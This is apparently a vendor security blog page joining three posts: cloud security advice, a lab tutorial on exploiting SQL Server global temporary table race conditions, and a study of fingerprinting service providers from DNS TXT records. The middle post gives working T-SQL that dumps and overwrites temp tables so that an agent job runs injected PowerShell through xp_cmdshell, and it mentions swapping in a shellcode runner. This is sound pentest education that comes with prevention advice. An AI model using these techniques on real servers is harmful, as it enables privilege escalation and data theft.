Back

Your Cloud Assets are Probably Not as Secure as You Think They Are

Despite a plethora of available tools and resources, there are still many ways to configure cloud services incorrectly. According to a Wall Street Journal article published earlier this year, research and advisory firm Gartner Inc. estimated that up to 95% of cloud breaches occur due to human errors such as configuration mistakes. Not surprisingly, there have been frequent public and private cloud breaches − even for organizations with significant resources and mature security programs.
So what can we do about it?

Based on many discussions with our clients, NetSPI has identified a number of common security issues that span different cloud platforms, environments, and even vertical markets:

  • Lack of multi-factor authentication – A cloud breach is often achieved by using common vulnerabilities, public data exposures, and active credential guessing attacks, for example by enumerating a potential email address off of a public data source and guessing credentials. You may find it surprising that many cloud services do not use multifactor authentication right out of the box.
  • Integration of cloud and on-premise networks – Integrating cloud and on-premise environments makes it easier to migrate resources, users, and accounts out to a cloud provider. However, it does increase risk, especially if federated authentication, shared user accounts, and the same active directory environment are used. This makes it much easier for attackers to pivot into traditional (often less secure) network resources once they have gained access to the cloud.
  • Poor permission configuration – Security can sometimes take a back seat when developers are trying to be agile and for simplicity, accounts can be over-permissioned. This is a growing problem, in part because of the increasing popularity of public repositories and Internet services like GitHub to manage code and configurations. This has led to a rise in accidental pastes of copied user names and passwords on the Internet, which can be leveraged by malicious actors.

How You Can Protect Yourself

With these issues in mind, what steps can you take to improve your cloud security? First, it’s important to practice proper cloud hygiene at the outset by: (a) clearly defining requirements, (b) isolating development, staging, and production environments, and (c) limiting privileges in all environments to guard against escalation by malicious actors.

Second, NetSPI recommends pentesting regularly and fully. This includes penetration testing all layers of your environment and using cloud configuration reviews to evaluate how well the security controls your cloud provider has available are actually protecting your cloud application(s). Traditional penetration testing does not go deep enough when you are running cloud applications, which is why more rigorous cloud penetration testing is critical.

In addition to the common insights gained from an external penetration test, a cloud penetration test goes much further to include testing on cloud hosts and services. Internal network layer testing of virtual machines and services from the cloud virtual networks are included, as well as external network layer testing of externally exposed services. In addition, a configuration review of cloud services also includes reviews of firewall rules, access controls (IAM/RBAC) of users/roles/groups/policies, as well as utilized cloud services (storage, databases, etc.).

Recommendations for Undertaking Cloud Penetration Testing

It’s clear that full and regular pentesting is a sure-fire way to improve the security of your applications and data residing in the cloud and ultimately your on-premise network if both environments are closely integrated. If you are planning on undertaking cloud penetration testing, NetSPI recommends the following best practices:

  • Ensure systems and services are updated and patched in accordance with industry/vendor recommendations
  • Verify if identity and access management (IAM) and role-based access control (RBAC) roles are assigned appropriately and not over-permissioned and there is no provision for permission escalation
  • Use security groups and firewall rules to limit access between services and virtual machines
  • Ensure that sensitive information is not written in clear text to any cloud storage services and encrypt data prior to storage
  • Verify user permissions for any cloud storage containing sensitive data and ensure that the rules represent only the users who require access to the storage
  • Ensure only the appropriate parties have access to key material for decryption purposes

One Last Thought

As a security vendor, we hear statements every day like, “Cloud doesn’t change anything from a security perspective because it’s all the same stuff, just in a different place” or “My cloud provider takes care of security.” In the rush to embrace cloud and its advantages, some security best practices have fallen by the wayside. Now’s the time to refocus on securing assets by working proactively with your cloud services provider and cloud penetration testing regularly. The last thing you want is to be included in those ever-increasing cloud breach statistics.

Learn about NetSPI’s cloud penetration testing services for AWS, Azure, and Google Cloud.

Back

Exploiting SQL Server Global Temporary Table Race Conditions

SQL Server global temporary tables usually aren’t an area of focus during network and application penetration tests.  However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users.  In this blog, I’ll walk through how global temporary tables work, and share some techniques that we’ve used to identify and exploit them in real applications.

If you don’t want to read through everything you can jump ahead:

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';

Img Create Login

What are Global Temporary Tables?

The are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I’ve seen, there are three types of temporary tables commonly used by developers that include table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user.  As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables.

All of the temporary tables are stored in the tempdb database and can be listed using the query below.

SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';

All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on  the table type and scope.

Below is a summary of the scope for each type of temporary table.

Img Types Of Temp Tables
With that foundation in place, let’s walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users.

Below is an example of referencing a table variable in the same batch.

-- Create table variable
If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable')
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO

Img Table Variable Same Batch

We can see from the image above that we are able to query the table variable within the same batch query.  However, when we separate the table creation and table data selection into two batches using “GO”, we can see that the table variable is no longer accessible outside of its original batch job.  Below is an example.

Img Table Variable Diff Batch

Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they’re stored.  When you create a table variable it’s stored in tempdb using a name starting with a “#” and randomly generated characters.  The query below can be used to filter for table variables being used.

SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.

-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO

Img Local Temp Table

As you can see from the image above, the table data can still be accessed across multiple query batches.  Similar to table variables, all custom local temporary tables need to start with a “#”.  Other than you can name them whatever you want.  They are also stored in the tempdb database, but SQL Server will append some additional information to the end of your table name so access can be constrained to your session.  Let’s see what our new table “#LocalTempTbl” looks like in tempdb with the query below.

SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1
</code

Img Local Temp Table

Above we can see the table we created named “#LocalTempTbl”, had some of the additional session information appended to it.  All users can see the that temp table name, but only the session that created it can access its contents.  It appears that the session id appended to the end increments with each session made to the server, and you can actually use the full name to query that table from with your session.  Below is an example.

SELECT * 
FROM tempdb..[ #LocalTempTbl_______________________________________________________________________________________________________000000000007]
</code

Img Local Temp Table

However, if you attempt to access that temp table from another user’s session you get the follow error.

Img Local Temp Table

Regardless, when you’re all done with the local temporary table it can be removed by terminating your session or explicitly dropping it using the example command below.

DROP TABLE #LocalTempTbl

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables you can create and access global temporary tables from separate batched queries. The big difference is that ALL active user sessions can view and modify global temporary tables.  Let’s take a look at a basic example below.

-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO

Img Global Temp Table

Above we can see that we are able to query the global temporary table across different query batches. All custom global temporary tables need to start with “##”.  Other than you can name them whatever you want.  They are also stored in the tempdb database.  Let’s see what our new table “##GlobalTempTbl” looks like in tempdb with the query below.

SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1
</code

Img Global Temp Table

You can see that SQL Server doesn’t append any session related data to the table name like it does with local temporary tables, because it’s intended to be used by all sessions. Let’s sign into another session using the “basicuser” login we created to show that’s possible.

Img Global Temp Table

As you can see, if that global temporary table contains sensitive data it’s now exposed to all of the SQL Server users.

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target Global Temp Tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried.  So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables.

  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you’re logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, store procedures, functions, and triggers for each database. You should be able to filter the query results for the string “##” to identify the use of global temporary table usage in the TSQL. With the filtered list in hand, you should be able to review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack.

Below are some links to TSQL query templates to get you started:

It’s worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:

  • Get-SQLAgentJob
    Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml

It would be nice if we could always just view the source code, but the reality is that most attackers won’t have sysadmin privileges out of the gate.  So, when you find you self in that position it’s time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.

-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

If you didn’t DROP “##GlobalTempTbl”, then you should see something similar to the results below when you execute the query.

Img Global Temp Table

Running the query above provides insight into the global temporary tables being used at that moment, but it doesn’t help us monitor for their use over time.  Remember, temporary tables are commonly only used for a short period of time, so you don’t want to miss them.

The query below is a variation of the first query, but will provide a list of global temporary tables every second.  The delay can be changed by modifying the “WAITFOR” statement, but be careful not to overwhelm the server.  If you’re not sure what you’re doing, then this technique should only be practiced in non-production environments.

-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
    JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
    WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

    -- Set delay
    WaitFor Delay '00:00:01'
END

Img Global Temp Table

As you can see, the query will provide a list of table names and columns that we can use in future attacks, but we may also want to monitor the contents of the global temporary tables to understand what our options are. Below is an example, but remember to use “WAITFOR” to throttle your monitoring when possible.

-- Monitor contents of all Global Temp Tables 
-- Loop
WHILE 1=1
BEGIN
    -- Add delay if required
    WAITFOR DELAY '0:0:1'
    
    -- Setup variables
    DECLARE @mytempname varchar(max)
    DECLARE @psmyscript varchar(max)

    -- Iterate through all global temp tables 
    DECLARE MY_CURSOR CURSOR 
        FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
    OPEN MY_CURSOR
    FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    WHILE @@FETCH_STATUS = 0
    BEGIN 

        -- Print table name
        PRINT @mytempname 

        -- Select table contents
        DECLARE @myname varchar(max)
        SET @myname = 'SELECT * FROM [' + @mytempname + ']'
        EXEC(@myname)

        -- Next record
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    END
    CLOSE MY_CURSOR
    DEALLOCATE MY_CURSOR
END

Img Global Temp Table

As you can see, the query above will monitor for global temp tables and display their contents.  That technique is a great way to blindly dump potentially sensitive information from global temporary tables, even if they only exist for a moment.  However, sometimes you may want to modify the contents of the global temp tables too.  We already know the table and column names. So, it’s pretty straight forward to monitor for global temp tables being created and update their contents.  Below is an example.

-- Loop forever
WHILE 1=1 
BEGIN    
    -- Select table contents
    SELECT * FROM ##GlobalTempTbl

    -- Update global temp table contents
    DECLARE @mycommand varchar(max)
    SET @mycommand = 'UPDATE t1 SET t1.SpyName = ''Inspector Gadget'' FROM ##GlobalTempTbl  t1'        
    EXEC(@mycommand)    
END

Img Global Temp Table

As you can see, the table was updated. However, you might still be wondering, “Why would I want to change the contents of the temp table?”.  To help illustrate the value of the technique I’ve put together a short case study in the next section.

Case Study: Attacking a Vulnerable Agent Job

Now for some real fun.  Below we’ll walk through the vulnerable agent job’s TSQL code and I’ll highlight where the global temporary tables are being used insecurely.  Then we’ll exploit the flaw using the previously discussed techniques. To get things started, download and run this TSQL script as a sysadmin to configure the vulnerable agent jobs on the SQL Server instance.

Vulnerable Agent Job Walkthrough

The agent will execute the TSQL job every minute and perform the following process:

  1. The job generates an output file path for the PowerShell script that will be executed later.
    -- Set filename for PowerShell script
    Set @PsFileName = ''MyPowerShellScript.ps1''
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
  2. The job creates a string variable called “@MyPowerShellCode” to store the PowerShell script. The PowerShell code simply creates the file “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogintendedoutput.txt” and contains the string “hello world”.
    -- Define the PowerShell code
    SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' +  @TargetDirectory + ''intendedoutput.txt"''

    Pro Tip: The SQL Server and agent service accounts always have write access to the log folder of the SQL Server installation. Sometimes it can come in handy during offensive operations. You can find the log folder with the query below:

    SELECT SERVERPROPERTY('InstanceDefaultLogPath')
  3. The “@MyPowerShellCode” variable that contains the PowerShell code is then inserted into a randomly named Global Temporary Table. This is where it all starts to go wrong for the developer, because the second that table is created any user can view and modify it.
    -- Create a global temp table with a unique name using dynamic SQL 
    SELECT  @MyGlobalTempTable =  ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000))
    
    -- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table
    SELECT  @Command = ''
            CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) 
            INSERT INTO  ['' + @MyGlobalTempTable + ''](PsCode) 
            SELECT @MyPowerShellCode''
    
    -- Execute that command 
    EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode
  4. Xp_cmdshell is then used to execute bcp on the operating system. Bcp is a backup utility that ships with SQL Server.  In this case, it’s being used to connect to the SQL Server instance as the SQL Server service account, select the PowerShell code from the Global Temporary Table, and write the PowerShell code to the file path defined in step 1.
    -- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1
    SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME-- Write the file
    EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT
  5. Next, xp_cmdshell is used again to execute the PowerShell script that was just written to disk.
    -- Run the PowerShell script
    DECLARE @runcmdps nvarchar(4000)
    SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"''
    EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT
  6. Finally, xp_cmdshell is used one last time to remove the PowerShell script.
    -- Delete the PowerShell script
    DECLARE @runcmddel nvarchar(4000)
    SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"''
    EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT

Vulnerable Agent Job Attack

Now that our vulnerable agent job is running in the background, let’s log in using our least privilege user “basicuser” to conduct our attack. Below is a summary of the attack.

  1. First, let’s see if we can discover the global temporary name using our monitoring query from earlier. This monitoring script is throttled. I do not recommend removing the throttle in production, it tends to consume a lot of CPU, and that will set off alarms, because DBAs tend to monitor the performance of their production servers pretty closely. You’re much more likely to get a caught causing 80% utilization on the server than you are when executing xp_cmdshell.
    -- Loop
    While 1=1
    BEGIN
        SELECT t1.name as 'Table_Name',
               t2.name as 'Column_Name',
               t3.name as 'Column_Type',
               t1.create_date,
               t1.modify_date,
               t1.parent_object_id       
        FROM tempdb.sys.objects AS t1
        JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
        JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
        WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
    
        -- Set delay
        WAITFOR DELAY '00:00:01'
    END

    The job takes a minute to run so you may have to wait 59 seconds (or you can manually for the job to execute in the lab), but eventually you should see something similar to the output below.
    Img Case Study Gtt

  2. In this this example, the table name “##temp800845” looks random, so we try monitoring again and get the table name “##103919”. It has a different name, but it has the same columns.  That’s enough information to get us moving in the right direction.
    Img Case Study Gtt
  3. Next, we want to take a look at the contents of the global temporary table before it gets removed. However, we don’t know what the table name will be.  To work around that constraint, the query below will display the contents of every global temporary table.
    -- Monitor contents of all Global Temp Tables 
    -- Loop
    While 1=1
    BEGIN
        -- Add delay if required
        WAITFOR DELAY '00:00:01'
        
        -- Setup variables
        DECLARE @mytempname varchar(max)
        DECLARE @psmyscript varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN 
    
            -- Print table name
            PRINT @mytempname 
    
            -- Select table contents
            DECLARE @myname varchar(max)
            SET @myname = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@myname)
    
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END

    Img Case Study Gtt A
    From here we can see that the global temporary table is actually housing PowerShell code. From that, we can guess that it’s being executed at some point down the line. So, the next step is to modify the PowerShell code before it gets executed.

  4. Once again, we don’t know what the table name is going to be, but we do know the column names. So can we modify our query from step 3, and UPDATE the contents of the global temporary table rather than simply selecting it’s contents. In this case, we’ll be changing the output path defined in the code from “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogintendedoutput.txt” to “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogfinishline.txt”.  However, you could replace the code with your favorite PowerShell shellcode runner or whatever arbitrary commands bring sunshine into your day.
    -- Create variables
    DECLARE @PsFileName NVARCHAR(4000)
    DECLARE @TargetDirectory NVARCHAR(4000)
    DECLARE @PsFilePath NVARCHAR(4000)
    
    -- Set filename for PowerShell script
    Set @PsFileName = 'finishline.txt'
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
    
    -- Loop forever 
    WHILE 1=1 
    BEGIN    
        -- Set delay
        WAITFOR DELAY '0:0:1'
    
        -- Setup variables
        DECLARE @mytempname varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN         
            -- Print table name
            PRINT @mytempname 
        
            -- Update contents of known column with ps script in an unknown temp table    
            DECLARE @mycommand varchar(max)
            SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''Write-Output "hello world" | Out-File "' + @PsFilePath + '"'' FROM ' + @mytempname + '  t1'
            EXEC(@mycommand)    
    
            -- Select table contents
            DECLARE @mycommand2 varchar(max)
            SET @mycommand2 = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@mycommand2)
        
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname  
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END

    Img Case Study Gtt
    As you can see from the screenshot above, we were able to update the temporary table contents with our custom PowerShell code. To confirm that we beat the race condition, verify that the “C:Program FilesMicrosoft SQL ServerMSSQL12.SQLSERVER2014MSSQLLogfinishline.txt” file was created.
    Note: You’re path may be different if you’re using a different version of SQL Server.Img Case Study Gtt

Tada! In summary, we leveraged the insecure use of global temporary tables in a TSQL agent job to escalate privileges from a least privilege SQL Server login to the Windows operating system account running the SQL Server agent service.

What can I do about it?

Below are some basic recommendations based on a little research, but please reach out if you have any thoughts.  I would love to hear how other folks are tackling this one.

Prevention

  1. Don’t run code blocks that have been stored in a global temporary table.
  2. Don’t store sensitive data or code blocks in a global temporary table.
  3. If you need to access data across multiple sessions consider using memory-optimized tables. Based on my lab testing, they can provide similar performance benefits without having to expose data to unprivileged users. For more information check out this article from Microsoft.

Detection

At the moment, I don’t have a great way to monitor for potentially malicious global temporary table access.  However, if an attacker is monitoring global temporary tables too aggressively the CPU should spike and you’ll likely see their activity in the list of expensive queries.  From there, you should be able to track down the offending user using the session_id and a query similar to:

SELECT 
    status,
    session_id,
    login_time,
    last_request_start_time,
    security_id,
    login_name,
    original_login_name
FROM [sys].[dm_exec_sessions]

Wrap Up

In summary, using global temporary tables results in race conditions that can be exploited by least privilege users to read and modify the associated data. Depending on how that data is being used it can have some pretty big security implications.  Hopefully the information is useful to the builders and breakers out there trying to make things better. Either way, have fun and hack responsibility.

References

Back

Analyzing DNS TXT Records to Fingerprint Online Service Providers

DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company.

In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint.

Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”.

Below is an outline of how that process typically works:

  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.

It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using.

Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload of a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites.  I used a slightly older list, but for those looking to mine that information on a reoccurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon .  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites.

Below is the basic collection script I used.

# Import list of domains
$Domains = gc c:tempdomains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:

  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation.

Below are the top 5 categories:

 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.

There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically there are not domain validation tokens.  However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well.  Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.

 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO–GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
